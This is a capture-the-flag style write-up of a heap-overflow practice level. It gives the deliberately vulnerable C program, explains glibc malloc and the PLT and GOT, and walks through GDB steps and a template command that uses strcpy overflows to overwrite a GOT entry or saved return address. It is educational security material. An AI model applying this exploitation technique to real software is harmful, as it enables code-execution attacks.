Level text

#include <stdlib.h> #include <unistd.h> #include <string.h> #include <stdio.h> #include <sys/types.h> struct internet { int priority; char *name; }; void winner() { printf("and we have a winner @ %d

", time(NULL)); } int main(int argc, char **argv) { struct internet *i1, *i2, *i3; i1 = malloc(sizeof(struct internet)); i1->priority = 1; i1->name = malloc(8); i2 = malloc(sizeof(struct internet)); i2->priority = 2; i2->name = malloc(8); strcpy(i1->name, argv[1]); strcpy(i2->name, argv[2]); printf("and that's a wrap folks!

"); }

Intro

This level covers another heap-based vulnerability exploitation and unlike the previous level, which was just an introductory one, this level requires us to exploit a vulnerability using a technique similar to stack-based buffer overflows used in the previous levels to redirect execution of the program to our desired location, function winner.

First time I encountered malloc was in an introductory C programming class and used it rarely ever again. I just knew that it allocated memory and returned an address to that allocated space. Although not necessary for solving it, this level made me explore the inner workings and some implementation details of this important function.

malloc and free are two functions used in dynamic memory allocation. malloc is used for allocating memory space and free for deallocating it. It is necessary to say that those two functions are not system calls but convenient wrappers around system calls. For example, malloc will call system calls brk or mmap, depending on the situation, to request more free space from the kernel. Imagine them as wrappers which could (and usually are) implemented differently across different systems, but the general functionality remains the same. You can read more about the inner workings of malloc and heaps in general at [1] which describes the glibc implementation of malloc.

Ok, this level focuses on the heap and not the stack, but what are the differences between the two and what are the implications for our approach to the solution?

Stack is used for static memory allocation and heap for dynamic. The stack is a LIFO (last in first out) structure used for storing local variables, tracking and calling function calls with the most recently reserved block always freed first. Managing the stack is trivial by incrementing or decrementing a pointer while the heap management is more complex. The complexity of heap management follows from its structure because unlike the stack, the heap is not well structured (adjacency of reserved memory is not guaranteed). Heap is a memory space which can be arbitrarily populated via allocations of different sizes and subsequent allocations may not be trivial if (for example) there is not enough space for reserving desired amount of memory on the heap, in which cases additional interactions with the kernel are required. There is one stack for each existing thread, while the number of heaps can vary from one to many, but unlike the stack, maximum number of threads can be much greater than the number of heaps, meaning some threads will share heaps. From the malloc glibc implementation, the number of so called “arenas” (I imagine the arenas as a heap container which can store multiple heaps, read more at [1]) is determined by the number of processor cores and architecture (32 bit vs. 64 bit). This means that there is a need for synchronization because of contemporary thread allocations on the same heap(s), which will slow things up. In contrast, the same stack addresses are usually accessed much more often so they can be mapped (because we work in the virtual address space) to the processor’s cache and their access can be sped up significantly. Unlike the stack which has a fixed size determined when the thread is created, the heap size is set on application startup and can grow as it is needed by the application (by asking the kernel for more memory using aforementioned system calls).

The things we know for now is that we need to somehow redirect program execution. Ok, great, the first thing that comes to mind is overwriting the return address of main, but how? We can see from lines 31 and 32 from the code above that the first argument is copied to the first structure’s name attribute (it’s allocated space on the heap) which size is 8 bytes and then the next argument is copied to the second structure’s name allocated space. If we recall how strcpy works, we know that it copies byte array given as the second argument to the address given by the first argument, without making security checks if there is enough allocated space to accommodate the whole byte array given (in this case, by the user). This is our attack vector.

If we give a sufficiently large input (in this case, larger that 8 bytes) as the first argument, it will cause an overflow on the heap. Now, let’s recall what that means: We had a bunch of calls to malloc which allocates some space on the heap and then we copy user input to that space. Note that the memory allocated spaces don’t have to be adjacent, because malloc tries to find a sufficiently large space to accommodate the desired amount of bytes and nothing ensures that the space between two subsequent allocations is not occupied by some other allocation that happened before that. I will go more into detail in the “solution” section of this post.

The main idea behind this attack is to overflow allocated memory given by one call of malloc and for that overflowed data to overwrite some specific address at some location in an another heap allocated space given by another malloc call. The idea is the same as the one we did before on the stack based overflow levels, the only difference is that nothing ensures adjacency of interesting memory addresses (because we work on the heap and not the stack).

Exploit consists of overflowing the second allocated memory space (specifically the space pointed to by i1->name) into the memory space pointed to by i2, overwriting the memory address of i2->name pointer so that it points to some desired address that we want. That gives us the ability to redirect program flow to address given by the second user given argument, which will be written to the overwritten address of i2->name pointer. Details of this exploitation will be covered in the next part of this post.

Solution

Steps for exploitation:

Find where i1->name is pointed at after memory allocation (where data will be stored). Find address of i2->name character pointer (which we need to overwrite). Find the offset from *(i1->name) to i2->name so we can tailor out input. Find address of winner (which we need to call). Find address of location from where the execution will be redirected from (location from which we will bounce our execution to winner). Execute exploit.

Step 1: using GDB, we first disassemble the binary using disassemble main, note that the standard disassembly syntax is set to AT&T, to set it to Intel which is in my opinion more readable, enter GDB command set disassembly-flavor intel. Find the malloc call which corresponds to the one at the 25th line in the given code (located at (main + 46)) and set a breakpoint line after that using command break *(main + 47). The result of malloc function call, which is the address of allocated space, will be stored in EAX register, which we can (after hitting our breakpoint) see with the command info registers eax or i r eax for short. After running the program with run command, we find that the address of memory allocated to i1->name is: *(i1->name)@0x095BA018 (address may vary).

Step 2: almost the same as in previous step, except now we need the actual address of i2->name struct member and not the memory allocated to it. This can be achieved by setting a breakpoint immediately after memory allocation for i2 is done by the malloc call at line 27 in given C code. After finding that call in disassembly, the breakpoint is set at *(main + 68), this gives us the address of memory allocated for accommodating the internet structure and pointed to by i2 which is: i2@0x095ba028. If we look at the internet structure, we can conclude that the address of name structure member (which is of type character pointer) will reside 4 bytes after the beginning of the memory allocated for the structure itself (after i2@0x095ba028), so the address of name member is: i2->name@0x095ba02c.

Step 3: we need to find out the offset from the address found at step 1 to the address found at step 2 so we know how many bytes we need to supply via user input. This is done simply by subtracting: 0x095ba02c – 0x095ba018 = 0x14 = 20 bytes. This means we need to write in 20 bytes as the first argument to overflow to the i2->name structure member and the bytes we write next will overwrite it. Note that this program is not big and that there is plenty of space on the heap. Although nothing guarantees that subsequent calls to malloc will result in adjacent memory allocations, by the described way the heap works (as a doubly linked list of free memory chunks) I can assume that at least first few allocations could result in adjacent memory spaces. Let’s see with GDB. Setting breakpoint after user input is written to allocated memory addresses, we examine the memory:

Let’s analyze the i1 structure. When structure corresponding to i1 was allocated, malloc returned address 0x800 4a008, at which is the content of the priority field (set to 1). Little before that is a field with 0x00000011. This field represents how many bytes does the allocation take and the last bit (PREV_INUSE flag bit is set, look at [1]) means that the previous chunk is allocated and because of that, the 0x00000000 bytes starting at address 0x804a000 represent user data (the same goes with the other chunks). We can also see that consecutive malloc calls gave consecutive accessible memory regions starting at: 0x804a008, 0x804a018, 0x804a028, 0x804a038.

Step 4: to get the address of winner we can enter in GDB the commandand get the address:

Step 5: this is the address from which the program flow could be redirected. For example, this can be the location of the saved return address (also called saved eip), which, when overwritten to the address of winner function, will redirect our program flow to the winner function when the program attempts to return from main program function. We did this a lot in the stack-based buffer overflow levels. The more reliable way (which I recall I did only a few times before) is to overwrite the PLT (procedure linkage table) entry for some dynamically linked function from our program (such as printf function).

A short reminder on how PLT and GOT work (the details can be found at [2]): When you compile a program that uses some dynamically linked library (for example you have a printf call), you don’t write that function’s code yourself because it already exists somewhere on the system in some library. Because the compiler doesn’t know the exact address of that function (because it doesn’t know where exactly the library will be loaded during execution) it leaves a “blank” space reserved for the address of that function in the Global Offset Table (GOT). If we say GOT is all we need, we might get into trouble, because that means we need to resolve (find) all the addresses of all the functions provided by that dynamically linked library and put them into GOT because we don’t know which functions will get called and which wont, this means that if we have a small program with only one call to printf, we would still need to find all the addresses to all the other functions provided by C standard library (where printf is defined) and that takes time. To aid this problem another level of indirection is implemented in the form of a Procedure Linkage Table (PLT) which is basically just a “trampoline” that instructs the resolution only of those functions we need to call in our program. So when we call printf we won’t actually call printf directly, but corresponding PLT entry will be called instead , which is just a piece of code instructing the resolution of the function’s address which will be added to GOT. This is called “lazy” approach.

So we are left with two options (two that I know about at least): The address of the saved instruction pointer register (saved RETURN address) which we can get with the GDB command info frame: saved_EIP@0xfff9767c. Another option is to find the address of the PLT entry from a known function call, for example printf. In disassembly we can see that there is no printf call, only a call to puts. This is just an optimization which will still work fine.

As I said before, PTL entries are just a bunch of code, which means we could disassemble it:

So the address we could overwrite is the address the PLT entry for puts will jump to when trying to resolve its address in GOT: puts_GOT@0x08049774.

Step 6: the exploit is executed by providing tailored input as the two command line arguments the program expects. The goal of the first argument is to overflow i1->name heap buffer into the i2 structure and overwrite the address of i2->name with the address of either the saved_EIP or puts_GOT address. The goal of the second argument is to simply provide the address to which the execution will be redirected.

Generally, exploit could look like this:

./heap1 `python -c ‘print “A” * struct_offset + exec_redir_addr + ” ” + winner_addr‘`

Where:

struct_offset = 0x14 = 20 bytes

exec_redir_addr = puts_GOT or saved_EIP

or winner_addr = 0x08048494

Here is proof of work:

NOTE #1: Addresses may vary.

NOTE #2: Although the level can be exploited on the given virtual machine, I wanted to copy the heap1 level to my local Kali machine because I’m more used to it and wanted to exploit it there. From here I stumbled upon some problems. I tried with the saved_EIP exploit method and noticed that each time I tried to start the program using the same exploit from the same directory (so the environment variables would not change) the address of saved_EIP would change. This is because ASLR is enabled by default. To prove this, I temporarily disabled ASLR by editing /proc/sys/kernel/randoimze_va_space and changing its value from 2 to 0 (which disables it). Next time I ran the program the address of saved_EIP didn’t change through consecutive program execution and the exploit was possible. Exploitation by overwriting puts_GOT didn’t result in GOT jump address (first instruction inside PLT) being randomized, even if ASLR is used and the GOT is inside the data segment which should be randomized by ASLR. I did a minor research and found that if the executable is not compiled as PIE (that is position independent executable) you don’t get much benefit from ASLR because not every memory region gets randomized, and I can’t find out why exactly. My guess is because maybe PLT couldn’t work with everything randomized as it needs to know the position of GOT . [3] states that if executable isn’t PIE, it surely hasn’t it’s text segment randomized, also this post states that any reference from a non-PIC/PIE code to a function from a dynamically linked library needs PLT for address resolution because the non-PIC/PIE executable expects function addresses to be static/known (which they are, because the real function call is replaced with PLT entry address which is known prior to execution).

References

[1] https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/

[2] https://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/

[3] https://securityetalii.es/2013/02/03/how-effective-is-aslr-on-linux-systems/

Thank you for reading!